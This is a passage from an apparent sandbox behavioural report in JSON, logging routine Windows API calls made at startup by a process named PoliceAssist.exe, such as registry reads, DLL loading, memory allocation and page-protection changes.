            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee166e7a0",
            "parentcaller": "0x7ffee1675084",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x000001d8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
              }
            ],
            "repeated": 0,
            "id": 4
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee166e7f0",
            "parentcaller": "0x7ffee1675084",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x000001d8"
              },
              {
                "name": "ValueName",
                "value": "PreferExternalManifest"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
              }
            ],
            "repeated": 0,
            "id": 5
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee166e818",
            "parentcaller": "0x7ffee1675084",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000001d8"
              }
            ],
            "repeated": 0,
            "id": 6
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1686103",
            "parentcaller": "0x7ffee16751de",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000021c"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\WindowsShell.Manifest"
              },
              {
                "name": "FileInformationClass",
                "value": "5",
                "pretty_value": "FileStandardInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x9e\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 7
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1674f83",
            "parentcaller": "0x7ffee167468c",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000021c"
              }
            ],
            "repeated": 0,
            "id": 8
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1674f8a",
            "parentcaller": "0x7ffee167468c",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000220"
              }
            ],
            "repeated": 0,
            "id": 9
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee167468c",
            "parentcaller": "0x7ffee1673b55",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00800000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 10
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1672a0e",
            "parentcaller": "0x7ffecf603a53",
            "category": "synchronization",
            "api": "NtAddAtomEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "AtomName",
                "value": "ThemePropScrollBarCtl"
              },
              {
                "name": "Atom",
                "value": "0x0000c020"
              }
            ],
            "repeated": 0,
            "id": 11
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1672a0e",
            "parentcaller": "0x7ffecf603a6d",
            "category": "synchronization",
            "api": "NtAddAtomEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "AtomName",
                "value": "MicrosoftTabletPenServiceProperty"
              },
              {
                "name": "Atom",
                "value": "0x0000c021"
              }
            ],
            "repeated": 0,
            "id": 12
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffecf603bac",
            "parentcaller": "0x7ffecf603add",
            "category": "misc",
            "api": "SystemParametersInfoW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "Action",
                "value": "0x00001022"
              },
              {
                "name": "uiParam",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 13
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee10be76a",
            "parentcaller": "0x7ffecf603aeb",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": false,
            "return": "0xffffffffc0000135",
            "pretty_return": "DLL_NOT_FOUND",
            "arguments": [
              {
                "name": "FileName",
                "value": "LPK"
              },
              {
                "name": "ModuleHandle",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 14
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee10be76a",
            "parentcaller": "0x7ffecf603b03",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "GDI32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1850000"
              }
            ],
            "repeated": 0,
            "id": 15
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffecf603b1e",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1850000"
              },
              {
                "name": "FunctionName",
                "value": "LpkEditControl"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1875740"
              }
            ],
            "repeated": 0,
            "id": 16
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffecf603b1e",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\\comctl32"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffecf639e70"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 17
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee34dc2c7",
            "parentcaller": "0x7ffee34dc05a",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\psapi"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee15f0000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee15f1110"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 18
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008ce000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 19
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\comdlg32"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1510000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee1543a50"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 20
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 21
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2060",
            "caller": "0x7ffee34ceb32",
            "parentcaller": "0x7ffee34877c3",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000038"
              },
              {
                "name": "Milliseconds",
                "value": "18446744073709551615"
              },
              {
                "name": "Status",
                "value": "Infinite"
              }
            ],
            "repeated": 2,
            "id": 22
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "1600",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 2,
            "id": 23
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "404",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008d0000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 24
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "404",
            "caller": "0x7ffee34e507d",
            "parentcaller": "0x7ffee34e4c43",
            "category": "threading",
            "api": "NtTestAlert",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 25
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400d415d",
            "parentcaller": "0x1400cdb19",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 26
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400cf0e0",
            "parentcaller": "0x1400cd9e4",
            "category": "misc",
            "api": "HeapCreate",
            "status": true,
            "return": "0x054c0000",
            "arguments": [
              {
                "name": "Options",
                "value": "0"
              },
              {
                "name": "InitialSize",
                "value": "0x00001000"
              },
              {
                "name": "MaximumSize",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 27
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400cda54",
            "parentcaller": "0x00000000",
            "category": "misc",
            "api": "GetCommandLineW",
            "status": true,
            "return": "0x0089219a",
            "arguments": [
              {
                "name": "CommandLine",
                "value": "\"C:\\Temp\\PoliceAssist.exe\" "
              }
            ],
            "repeated": 0,
            "id": 28
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400d0aa0",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054c2000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 29
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400d5319",
            "parentcaller": "0x1400d0b23",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054c3000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 30
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400d37d5",
            "parentcaller": "0x1400cad15",
            "category": "hooking",
            "api": "SetUnhandledExceptionFilter",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "ExceptionFilter",
                "value": "0x1400d3780"
              }
            ],
            "repeated": 0,
            "id": 31
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400aa4ba",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05350000"
              },
              {
                "name": "RegionSize",
                "value": "0x00100000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 32
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400aa4ba",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05350000"
              },
              {
                "name": "RegionSize",
                "value": "0x00012000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 33
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x1400ca9ff",
            "parentcaller": "0x1400cbba6",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x054c5000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 34
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": false,
            "return": "0xffffffffc0000135",
            "pretty_return": "DLL_NOT_FOUND",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\system32\\rpcss.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x00000202"
              }
            ],
            "repeated": 0,
            "id": 35
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "misc",
            "api": "NtQuerySystemInformation",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SystemInformationClass",
                "value": "0",
                "pretty_value": "FILE_SUPERSEDE"
              }
            ],
            "repeated": 0,
            "id": 36
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 37
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "42"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "2188"
              }
            ],
            "repeated": 0,
            "id": 38
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "kernel.appcore.dll"
              }
            ],
            "repeated": 0,
            "id": 39
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\kernel.appcore.dll"
              }
            ],
            "repeated": 0,
            "id": 40
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000001d0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\kernel.appcore.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 41
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000001cc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000001d0"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\kernel.appcore.dll"
              }
            ],
            "repeated": 0,
            "id": 42
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000001cc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea70000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00012000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 43
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea7f000"
              },
              {
                "name": "ModuleName",
                "value": "kernel.appcore.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 44
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea75000"
              },
              {
                "name": "ModuleName",
                "value": "kernel.appcore.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 45
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000001cc"
              }
            ],
            "repeated": 0,
            "id": 46
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000001d0"
              }
            ],
            "repeated": 0,
            "id": 47
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea75000"
              },
              {
                "name": "ModuleName",
                "value": "kernel.appcore.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 48
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\kernel.appcore"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedea70000"
              }
            ],
            "repeated": 0,
            "id": 49
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\kernel.appcore"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedea70000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffedea73f10"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 50
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee3271000"
              },
              {
                "name": "ModuleName",
                "value": "combase.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 51
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee3271000"
              },
              {
                "name": "ModuleName",
                "value": "combase.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 52
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 53
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtOpenSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000001cc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "bcryptPrimitives.dll"
              }
            ],
            "repeated": 0,
            "id": 54
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000001cc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1390000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00082000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 55
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee13f7000"
              },
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
